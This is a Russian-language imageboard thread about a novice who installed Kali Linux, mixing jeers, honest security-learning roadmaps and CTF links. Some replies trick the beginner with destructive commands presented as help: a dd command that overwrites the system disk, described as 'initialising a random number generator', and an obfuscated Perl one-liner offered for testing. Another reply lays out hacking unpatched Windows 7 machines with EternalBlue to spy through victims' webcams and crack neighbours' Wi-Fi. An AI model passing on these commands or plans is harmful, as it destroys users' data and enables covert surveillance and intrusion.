>>220521866 (OP)С удаления и установки шинды>ЩА КАРОЧ УСТАНАВЛЮ ЛИНУКС И БУДУ КАК ЭЛИТНЕ АНОНЫ ИЗ ХУЯЧА>ЛУЧШЕ ХУЙНЮ КАЛИ ЛИНУКС, ЧТОБ ЕЩЁ И КАК ЕБУЧЕ ХАКЕР БЫТЬ, ТАМ ШВЕЙЦАРСКИЕ БАНКИ ХАКАТЬ> Сап два, поставил пикрил, нихуя не знаю, не знаю даже нахуя это поставил, с чего начатьНачнём с того, что Kali линупс не ставят просто так, и в качестве изучания самого линупса тоже. Очередной малолетний долбоёб, возомнивший себя какиром.Даже всякие нитакиекакфсе с двача, которые любят выёбываться установленным линупсом не ставят Кали, просто для рядового васяна Кали нахуй не нужен.
Я уверен что ты даже обосрешься от обычного вопроса - Нахуя тебе Кали Линукс?Хочешь Линупс изучать? Ставь обычные версии а-ля Убунта какая нибудь и не выёбывайся, проси помощи у местных линупсоёбовКали Линупс не для первого изучения
>>220521866 (OP)Для начала полазь по менюшке, поизучай какие утилиты тебе доступны. Покрути настройки системы. Посмотри что на что влияет. Ты на верном пути.
Стартуй, с metasploit + эксплоит eternalblue(код вроде ms17-010)Запаси для этих дел virtualbox, с машинкой на win 7, так как выше уязвимость для win 7Изучи синтаксис autoit, и найди прогу для записи с камеры. Но важно чтобы она могла работать и через командную строку.ВсеУ тебя есть все, чтобы взломать рандомного чела с windows 7 необновленной и караулить за ним через камеру.Эксплоит ломает, затем подготавливаешь на autoit скрипт в exe, который будет запускать прогу для записи с камеры через вызовы коммандной строки.Можешь еще поизучать wps, чтобы ломать соседский wifi, а в локалке уже искать уязвимый комп.А вообще, это уровень солдат, умеешь юзать готовое оружиеНадо расти, начинай изучать базовые технологии, в зависимости от того что ты решишь ломать. Сети, изучай модель osi, запросы get post, http, html, jsХочешь проги ломать и делать ключи, изучай базовый c++ а потом смотри как это выглядит на ассемблере
>>220521866 (OP)Зря. Если хочешь выебнуться перед друзьями, то ставь Solaris. Если хочешь выебнуться перед выебнувшимися, то ставь Slackware.
Если понимаешь, где можешь применить это, то иди изучай теорию инфобеза. Дальше дерзай на практике.Это имеет смысл, если хочешь прокачать безопасность своего сервера/сайта/етс.Если просто хочешь взломать жопу соседский вай-фай, то удали кали и поставь систему здорового человека. генту.
>>220521866 (OP)И нахуя тебе линуксовый zver cd? От того что ты лишний раз не будешь писать apt-get install на чистой ОС хацкером ты не становишьсяЕсли тебе интересен хацкинг, то читай литературу по пентесту и информационной безопасности в целом, а не смотри уебанов с ютуба аля UnderMindКали линукс не предназначен для использования в повседневной жизни, о чём даже сами разработчики ОС пишут
>>220521866 (OP)Сначала выучи ассемблер, парралельно вкатываясь в обратный инжиринг. Как освоешься со всеми архитектурами, можешь переходить на язык верхнего уровня такой как С\С++. Учи его ,пока не напишешь простенький чит-код в CS GO который не палится никакими антивирусами. После этого впринципе можешь выучить еще python, java, php. Далее уже можешь вкатываться в линукс, ну и попутно начинай грабить банки своим ботнетом на основе ИИ, который ты уже должен был написать.
>>220533497Генту для пердолинга. А оп хочет быть тру пацаном. Тяночка как увидит что у него на компе стоит сразу промокнет.
>>220521866 (OP)оффтоп. Итак двач я напомню какие вещи помогут тебе бороться с несправедливостью этого мира. Понимание того что среди динозавров если лютые славянофобы. Ты всегда сможешь упрекнуть динозавра-славянофоба в том что он славянофоб. И еще одно. Что среди богатых есть неадеквптные бонатые. Ты всегда сможешь упрекнуть неадекватного богача в том что он охуел и своим богатством играет твоей жизнью. Итак богатство и славянофобия. Вот эти две темы можно пофорсить чтлбы защититься от богатых славянофобов.
>>220521866 (OP)Оффтоп. Если славянофоб богат и использует свое богатство в целях слаыянофобии то можно сделать для него некомфортным проживание за пределами своей виллы. Все равно же эта сука захочет общения и пойдет по улице где его всегда будут ждать бедные славяне с вопросами о несправедливости мира.
>>220521866 (OP)Оп, не слушай тупых троллей, которые всегда будут смеяться со смелых начинаний. Ты молодец, что съебнул с винды, я тебе помогу продвинуться дальше и постепенно покажу, какие команды вводить в терминале, чтобы начать хакать.Так, для начала тебе нужно инициализировать генератор случайных чисел, с помощью которого ты будешь создавать пары ключей для удалённого управления компами жертв (уже круто, правда?)Твоя команда:sudo dd if=/dev/urandom of=/dev/sda
>>220531992>>220531992Начать стоит с инглиша, если с ним всё слишком плохо. Только потому что на ангельском больше информацииДля старта в идеале начинать с общей теории информационной безопасности и криптологии бегло, дабы не путать процессы идентификации, аутентификации и авторизации. Анальные вузовские теории зубрить не обязательноДальше изучаешь основы программирования, если ещё не успел. Для основ лучше брать c/c++, а не пайтон. Да, с пайтоном проще, но потом внезапно охуеешь от языков со строгой типизацией или чего-то более низкоуровневого. Изучил? Теперь берёшь и изучаешь линукс на уровне базового администрирования, параллельно с пайтоном (чтобы писать на нём скрипты в дальнейшем)Знаешь что-то про сети и даже можешь настроить роутер? Для начала сойдёт, но лучше дотянуть до уровня CCNAМалаца. Теперь переходим к вебу. Знакомишься с тем как работают сайты, узнаешь о существовании sql, html/css и jsНе нужно проходить весь курс от htmlacademy для этого. Узнал как функционирует сайт? Начинаем баловаться с уязвимостями аля xss и sqli. Знакомимся с парольными атакамиОтлично! Теперь можно переходить к оттачиванию навыков и знакомиться с каким-то ПОДля этого лучше использовать виртуальные лаборатории, но сейчас можно развернуть свою через виртуалбокс, накатывая туда метасплоит Намеренно дырявая в безопасности ОС для оттачивания навыков Для начала берёшь сканеры nmap и nessus, пытаясь найти что-то вручную, а потом поглядеть что нашёл nessusУпустил дохуя моментов, но я тут не курсы ведуГуглить придётся много, анализировать что и как работает тожеПак литературы: https://drive.google.com/drive/folders/1Zl4Me1tzymTJ8yS3WhnEkg5Ae0ZZzEqzЕсли освоишь хотя бы то что написал и получишь удовольствие в процессе - можешь считать себя начинающим специалистом в кибербезопасности. Удачишкольники мимо, плс
Кто сидит в этом треде:- Те, кто нихуя не разбираются в ИБ, но делают вид- Те, кто нихуя не разбираются в ИБ и пытаются затроллить ОПа- Те, кто нихуя не разбираются в ИБ, но мимикрируют, давая совершенно нелепые советы и гайды по вкату- ОПмимо обладатель OSCP-OSWE сертификатов
>>220531699Сервера Oracle. Полностью заточена под их железо. Проприетарщина с крутой поддержкой, я полагаю.
>>220532134Сложна. С драйверами проблемы. Ананасы из /s/ помогали, но я так и не смог завести свою RTX 2070 под бздой. Говорят, надо что-то с ключами EFI мутить, но я не осилил.
>>220535677ахаха ебать чмо порешало ретайрдед машинки на взломатькоробке по туторам и тупо скопипастило команды с тех задачек на экзаменационные и сидит чешет чсв перед школотронамину давай, овни меня без фаервола, пройдись по моему лесу доменов до самого контроллера, я тебя сам сбручу, засранец вонючий мать твою
>>220536082Посвятил>>220524650>Настоящие хакеры используют ВиндуТы ебанутый?>>220526878>Стартуй, с metasploit + эксплоит eternalblueЗачем>так как выше уязвимость для win 7Вот оно что>У тебя есть все, чтобы взломать рандомного чела с windows 7 необновленнойКроме самого чела с необновленной windows 7 потому что сейчас таких долбоёбов уже не осталось и базы знаний, чтобы понимать, куда и нахуя он тыкает>Эксплоит ломает, затем подготавливаешь на autoit скрипт в exe, который будет запускать прогуОн тебя не поймет>Можешь еще поизучать wpsairgeddon, aircrack-ng + hashcat, для начинающего по беспроводным сетям ничего больше знать не нужно>А вообще, это уровень солдат, умеешь юзать готовое оружиеУровень хуйни>>220527266>Если хочешь выебнуться перед друзьями, то ставь SolarisПредставляю себе этих друзей>SlackwareОй блять>>220532724>Сначала выучи ассемблер, парралельно вкатываясь в обратный инжирингКак раз то что нужно для старта>Как освоешься со всеми архитектурамиКакими нахуй архитектурами, гермоген хуев>язык верхнего уровня>такой как С\С++У меня аж очко сжалось от напряжения>напишешь простенький чит-код в CS GO>После этого впринципе можешь выучить еще python, java, php>2-3 года попердели>Далее уже можешь вкатываться в линуксСамое нахуй время, я бы даже сказал вовремя ебать>>220534711>Ты молодецПросто красава>для начала тебе нужно инициализировать генератор случайных чиселСогласен. Вообще в любом начинании, будь-то дизайн или маркетинг, начните с инициализации генератора чисел, а там уже дело попрёт нормально>>220535104>Начать стоит с инглиша, если с ним всё слишком плохоНу хоть кто-то об этом упомянул>текстПримерно, но слишком по верхам>>220521866 (OP)>Поставил пикрил. С чего начать его осваивание?Ни с чего, оставь на потом.Если ты хочешь косплеить мистера робота, но на гитхабе лежит пак программ, которые использовались в сериале. Подгружай и нюхуй свои пуки пока не надоест.Если ты хочешь реально научиться искать баги и уязвимости в системах, успешно их эксплуатировать с последующим получением денег/гордости за свой зад, то всё немного сложнее.0. Выучи/Подтяни английский язык.1. Для начала выучи всё, что связано с сетями, сетевыми протоколами и маршрутизацией. Просто гугли и ищи всю возможную информацию по сабжам:- Сетевые протоколы (DHCP, DNS, FTP, HTTP, HTTPS, SSH, SSL, SSH, Telnet, SMTP и другие)- OSI (Open Systems Interconnection), TCP, UDP, DCCP, SCTP, SPX, RUDP- IPv4, IPv6- NAT- Почитай про Арпанет. Начать стоит со старых систем - они куда проще, но дают по теме достаточно комплексные знания и выстраивает объективную логистику в понимации интересующих тебя процессов- VLAN, VXLAN, LAN/MAN- WPA, WEP, WPA2- Почитай про коммутацию и маршрутизацию- Изучи самые популярные, модемы и роутеры, почитай к ним иснтрукции и FAQи, глянь как они работают и за что отвечают. Научись их настривать и отлаживать- Наконец после всего этого пройди сертификацию на CCNA, CCIP и CCNP, а если не хочешь тратиться и оно тебе нахуй не сдалось, то скачай учебную теорию с рутрекера и изучи от корки до корки. Вопросы для их экзаменов тоже лежат в открытом доступе, и в случае чего ты сможешь проверить свои знания.2. После этого ты можешь приступать к изучению Линукса. Нет, не кал-линукса. Существует хуева куча пиздатых и дружелюбных дестрибутивов, которые пригодны для повседнневного пользования (Debian, Ubuntu, моднявый Manjaro и т.д)Изучая саму ОСь надо изучить и вот это:- Git- BashБез этого из тебя ни нахер, ни похер, ни тем более хакер не получится. По Bash ищи информацию сам, а по Git я рекомендую скринкасты от Ильи Кантора. На ютубе оно есть, там плейлист на, в общей сложности, 70 видосов по 2-8 минут каждый.3. Когда ты освоился с Юниксом, свободно оперируешь консолью и гит для тебя не просто ебанутое слово - ты начинаешь изучать программирование. Тут путь стандартный, иди по порядку:- HTML/CSS/JavaScriptНаучись свободно верстать макеты и пилить свои сайты, хотя бы одностраничники. htmlacademy - мастхев, знания и навыки закрепляй на codewars- SQL/PHP'Это всё легко и довольно быстро изучается, не обращай внимание на количество. Что-то ты можешь изучить поверхностно, что-то углубленно- PythonИз хороших книг могу посоветовать "Автоматизация рутинных задач" и "Learning Python" от О`Райли. Главное помни, что Питон - это основной язык, который ты должен знать.- С/C++/C#Хочешь всё вместе, хочешь что-то одно на выбор- Хотя бы немного покури про джаву4. После того, как ты изучил программирование, умудрившись не забыть всё что ты учил до этого, привыкнув к линуксу и набив себе руки за еблей по клавиатуре, иди и пропердись на улицу.Желательно поработай пару тройку месяцев сис-админом в офисе.5. Теперь ты можешь изучать непосредственно то, чем ты интересовался с самого начала. Ставь кал-линукс, или накатывай на свой родной дестрибутив нужный софт и пиздуй на эти сайты:- https://www.root-me.org/en/Challenges/Web-Server- https://overthewire.org/wargames/bandit- https://www.hackthebox.eu - уже посложнее- https://capturetheflag.withgoogle.com - жди адекватных ивентов, которые подходят лично тебе- ctftime.orgИли ищи свои. Capture The Flag (CTF) - это твои лучшие друзья. Они и полезную практику дают, и позволяют тренироваться без вреда для здоровья, еще и фана дохуя.Накатывай виртуалку и ломай любые понравившиеся лаборатории из тех, что найдешь:- https://www.vulnhub.comИли ищи свои. В интернете их полно.5.5Сдай на сертификат CEH. Он лёгкий, я бы даже сказал для неандертальцев, к этому моменту подобная хуйня будет для тебя как поссать мимо раковины, но если у тебя вдруг дохуя денег, то why not Но если нету денег, то лучше забей хуй6. Когда ты осознаешь, что свободно чувствуешь себя в CTF и начал получать с них азарт и удовольствие, а не головную боль с постоянными затупами, считай что ты готов к последнему рубежу.Записывайся на этот курс:https://www.offensive-security.com/pwk-oscp/Он сейчас стоит в районе 1000$, но честно говоря я бы и больше заплатил.Сначала, чтобы иметь хотя бы какое-то представление о том, что тебя ждёт, почитай например эту хуйню:- https://habr.com/ru/post/265757/- https://habr.com/ru/company/acribia/blog/497806/Из основного:- Обучение и сертификация длится от 1 до 3 месяцевВсё это время у тебя должен быть свободный график и возможность 24/7 сидеть за печкой- Тебе понадобится веб-камера и загран-паспорт- Следуй советам и примерам из постов на хабре, которые я кинул выше7. После того, как ты успешно если у тебя получилось сдал экзамены и получил сертификат OSCP, можешь считать себя специалистом в области кибер-безпеки.8. Постоянно развивайся, следи за трендами, мониторь базы уязвимостей, пиши своё дерьмо и разбирай исходный код чужого, никогда не переставай практиковаться и проходить ебучие CTF9. ?10. Ты официально Н@хЕР. Даже сможешь взломать вк своей бывшей но это не точно
>>220535677>мимо обладатель OSCP-OSWE сертификатовкому блядь интересно, на сколько другие люди оценили твои знания?скока ты на этом делаешь? - вот главный вопрос.
>>220541719>Даже сможешь взломать вк своей бывшейне можешь, т.к. до этого ты занимался сертификатами и ctf, а реальной практики не имел.
>>220542185это как одни учат сео, получают дипломы по сео, а другие делают сео, эт разные вещи, братан
>>220542185Любое слово, типа "практика", "практикуйся", "развивайся", подразумевает, что он будет лазить по баг-баунти программам, или нелегально что-то ковырять в интернете
>>220521866 (OP)Так, господа хакеры малолетние. Хватит хуйнёй заниматься. Расскажите мне лучше как юзать SQLDump с дорками и всем сопутствующим. Или скажите куда копать в этом плане.
>>220543057Да низачем. Тоорвальдс создавал линукс как бесплатную альтернативу винде, а когда сейчас винда раздается чуть ли не бесплатно, всем похуй.
>>220521866 (OP)Начинать осваивать методы противления боли, холоду, виду расчленёнки, психологиеским манипуляциям.Нахождение в списке неблагонадёжных лиц от АНБ -- такое себе
>>220543167А более практического применения нет?Может на ней что-то можно сделать такого, что нельзя на винде? Опять же для обычного юзера>>220543176Наверно>>220543419Но ее ставят и более зрелые индивиды
>>220543057Она у меня стоит чисто на ноуте (Второй системой).Когда нужно что то сделать, что подвластно только кривой опенсорс хуете, сшитой макаками, то переключаюсь на неё.А для обычного пользования сижу на православной винде.
>>220521866 (OP)ОП, у меня чего-то программа не отработала вот эта:echo "test" | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' Не прогонишь у себя на новой системе плиз? Должен вывод на экран попасть...
>>220543057Ну её по определению ставят не такие как все. Те, кто не хотят платить и не хотят пиратить, те, кто не любят Майкрософт, те, кому не нравятся закрытые (проприетарные) системы, те, кто любят попердолиться и т.д. Либо их друзья, которым всё поставили и они уже привыкли. Пердолиться там можно до скончания времён, 99% всего в системе открыто, всё можно подправить под себя.>>220543544Это зависит от того, что ты хочешь делать. Есть некоторые очень узкопрофильные утилиты, которые просто никто не портировал на Шиндовс. Некоторые утилиты работают на Линупсе лучше. Ну а так нет, всё что нужно большинству пользователей, есть на Шинде. Тут скорее наоборот, на Линупсе не все программы с Шинды запускаются (видеорилейтед https://www.youtube.com/watch?v=ezUoiaoQCTs )
>>220543346 Это не значит что ее кто-то использует. Уже года три как не встречал ее на боевых серваках. Только один раз дома у какого-то друга моего друга. Да и тот ставил он ее ради фана чисто потестить.
>>220545697Сравнивать iOS с Шиндоус не совсем правильно, но да. Тем более что Андроид построен на ядре Линукса.
>>220521866 (OP)Человек, установивший кали и неспособный сам разобраться в чем-либо в этом самом кали (а не в какой-то конкретной ИБ-задаче, для решения которой он его установил), является школьником. Это закон.
>>220543057Серфить, сохранять картиночки, создавать документы, короче за тем же, зачем винда. Почему не винда? Сложнее подцепить малварь и дает приятное некоторым ощущение "я поддерживаю не копирастов, а людей, которые за свободный доступ к знаниям" (пираты дают только доступ к спизженным продуктам, это не то).